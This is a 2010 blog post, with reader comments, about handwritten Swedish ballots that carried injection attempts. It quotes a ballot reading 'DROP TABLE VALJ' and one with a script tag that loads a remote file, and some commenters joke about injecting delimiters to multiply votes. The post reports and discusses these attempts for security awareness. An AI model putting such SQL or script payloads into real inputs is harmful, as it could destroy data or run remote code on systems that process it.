Did Little Bobby Tables migrate to Sweden?

Posted by Jonas Elfström Thu, 23 Sep 2010 20:36:00 GMT

As you may have heard, we've had a very close election here in Sweden. Today the Swedish Election Authority published the hand written votes. While scanning through them I happened to notice

R;13;Hallands län;80;Halmstad;01;Halmstads västra valkrets;0904;Söndrum 4;pwn DROP TABLE VALJ;1

The second to last field1 is the actual text on the ballot2. Could it be that Little Bobby Tables is all grown up and has migrated to Sweden? Well, it's probably just a joke but even so it brings questions since an SQL-injection on election data would be very serious.

Someone even tried to get some JavaScript in there:

R;14;Västra Götalands län;80;Göteborg;03;Göteborg, Centrum;0722;Centrum, Övre Johanneberg;(Script src=http://hittepa.webs.com/x.txt);1

I'm pleased to see that they published the list as text and not HTML. This hacker/joker voter seems to think3 they "censored" his vote/script. I'm not so sure about that, a more reasonable explanation is that they couldn't enter brackets, quotation marks, and so on.

There are also a couple of URL:s to online retailers and three votes on a conspiracy friendly site. I chose not to link to any of those.

This time the pen and paper scripting attack failed. Let's hope it stays that way.


PS. Someone noticed that there are no votes from Stockholm in there right now (2010-09-24). I asked the Swedish Election Authority about this and it turns out that The County Administrative Board (Länsstyrelsen) gets two months to register all the handwritten votes. There's a good chance that those will bring more attempts like the ones above. DS.

EDIT 2010-09-24
Links:
Aftonbladet DN SvD Expressen SVT - all in Swedish.
Slashdot BBC Wired

1The name of the party, not a name of a person.
2Almost all Swedish voters use the preprinted ballots but you are allowed to write your own by hand.
3The site disappeared after this post was published.

Posted in Security | 31 comments

Comments

    1. Avatar
      Ruben Berenguel Thu, 23 Sep 2010 21:23:21 GMT

      Okay, now Sweden is my second favourite country after Iceland :)

      Cheers,

      Ruben

    2. Avatar
      Uwe Fri, 24 Sep 2010 04:46:18 GMT

      That’s really a great idea, will try this in Germany, too. Luckily, this XKCD strip is one of the fewer ones that I actually (think I) do understand.

    3. Avatar
      Name Fri, 24 Sep 2010 05:27:31 GMT

      @Uwe: I suppose you haven’t been to an election in Germany yet. There are no write-in votes here. If a ballot contains any kind of commentary it will be considered invalid and merely counted as such. I wouldn’t bet on being able to achieve any integer overflows either considering that the ballots are counted manually. ;-)

    4. Avatar
      Jonas Fri, 24 Sep 2010 06:27:27 GMT

      I would recommend that you place your vote on a real party instead.

    5. Avatar
      yaw Fri, 24 Sep 2010 06:48:21 GMT

      @Name

      There ist one exception:

      If there is an election of the mayor, you are allowed to write the name of the person you want to become mayor on the ballot, if you don’t agree with the prewritten choices on it.

    6. Avatar
      Carsten Fri, 24 Sep 2010 07:51:15 GMT

      That is awesome.

      Kind of reminds me of this story: https://www.sysedata.no/nyheter/edvin-tables#english.

      Making assuptions of lack of security often creates funny situations :)

    7. Avatar
      killswitch Fri, 24 Sep 2010 08:49:36 GMT

      @ name: in some of germany’s federal states you can propose your own candidate if it’s a mayoral election in a small commune

      @ topic: gogo gadget javascript

    8. Avatar
      Rias Fri, 24 Sep 2010 09:04:15 GMT

      @yaw

      you could also start a party and try to get on the ballot. You need about 2000 signatures in one Bundesland … As far as I know der no juristic restrictions on the party name ;)

    9. Avatar
      Stefan Fri, 24 Sep 2010 09:47:09 GMT

      @Name: Elections for mayors, at least in Germany’s federal state of Baden-Wuerttemberg allow voters to put a handwritten name on the ballot. So this idea is applicable in Germany as well.

    10. Avatar
      Martin Fri, 24 Sep 2010 11:16:06 GMT

      Haha, that’s about the only good thing this election has brought us.

      However, unless you possess the ability to time travel (kudos if you do), I’d say that now should probably be 2010-09-24 and not 2010-10-24.

    11. Avatar
      Ivar Fri, 24 Sep 2010 11:44:38 GMT

      So I should have voted for “Myself;1000000” to get a million votes?

    12. Avatar
      Super Fri, 24 Sep 2010 11:44:51 GMT

      I would recommend that you place your vote on a real party instead.

      Why cast 1 vote when you could cast 10 :)

    13. Avatar
      Jonas Elfström Fri, 24 Sep 2010 12:18:55 GMT

      @Martin Thanks! Corrected.

    14. Avatar
      Finnjävel Igen Fri, 24 Sep 2010 13:19:42 GMT

      Haha, candidate called Kalle Anka got 178 handwritten votes, which is quite a lot in a situation where 800 votes made a difference between majority and minority:-)

    15. Avatar
      humus Fri, 24 Sep 2010 14:04:45 GMT

      @finnjävel igen “Kalle Anka” is the name of donald duck in sweden ;D but your name sounds scandinavian..u probably know that already ^^

    16. Avatar
      Name Fri, 24 Sep 2010 14:43:30 GMT

      @yaw and others: Thank you for correcting me, I did not know that. So, @Uwe, good luck with your project :)

    17. Avatar
      Jonas Elfström Fri, 24 Sep 2010 15:00:47 GMT
    18. Avatar
      Finnjävel, not the previous one Fri, 24 Sep 2010 15:56:41 GMT
    19. Avatar
      Jonas Elfström Fri, 24 Sep 2010 16:36:15 GMT
    20. Avatar
      pipe Fri, 24 Sep 2010 16:43:53 GMT

      Argh. Someone should recall their “utgivningsbevis”. This is so stupid.

    21. Avatar
      Been there, done that Fri, 24 Sep 2010 22:43:41 GMT
    22. Avatar
      Thomas Mon, 27 Sep 2010 10:43:21 GMT

      If those findings show anything, than that: your swedish voting software seems to be secure in terms of Web Application Security. Be proud!

    23. Avatar
      Lurker111 Fri, 15 Oct 2010 00:09:42 GMT

      I occasionally code SQL to interface with customer data-bases. It had never occurred to me that the syntax of the overall SQL statement could be short-circuited in this way. Now that I think of it, it is rather obvious. One thing I do before accepting a character field is run it against a routine to double quote marks–this may prevent the attack. Does anyone know?

      (Naturally, quote marks & special characters in a numeric field trigger an edit error right away.)

    24. Avatar
      Jonas Elfström Fri, 15 Oct 2010 10:45:55 GMT

      @Lurker111 There are a lot of good advice on how to prevent SQL injection on Wikipedia.

    25. Avatar
      Security Tester Fri, 15 Oct 2010 14:25:32 GMT

      Lurker….character encoding might just work

    26. Avatar
      Headboards for beds Wed, 03 Nov 2010 03:35:29 GMT

      The Swedish Election Authority actually got back to you? Kudos!

    27. Avatar
      Jonas Elfström Wed, 03 Nov 2010 09:22:09 GMT

      Yes they did. They actually answered in a couple of hours.

    28. Avatar
      Jan Tagesgeld Fri, 26 Nov 2010 11:09:53 GMT

      Are there any legal implications with votes trying to mess up the voting system? I guess, there authorities are not too happy with these attempts but as nothing happened and the votes are anonymous, there is nothing, they can do :) And at first, I thought that “hittepa” was an attempt to write “http”, hehe.

    29. Avatar
      Dom Tue, 19 Apr 2011 12:35:12 GMT

      Haha wicked!

    30. Avatar
      Ian Best Sat, 24 Mar 2012 03:08:11 GMT

      Haha, nice idea, will start a party and try to get on the ballot. A win with predefined margin is guaranteed :)

    31. Avatar
      Dan Fri, 30 Mar 2012 02:35:07 GMT

      I wonder if little Bobby Tables is planning to migrate to the US as the 2012 presidential election is just a few months away. HA!

Comments are closed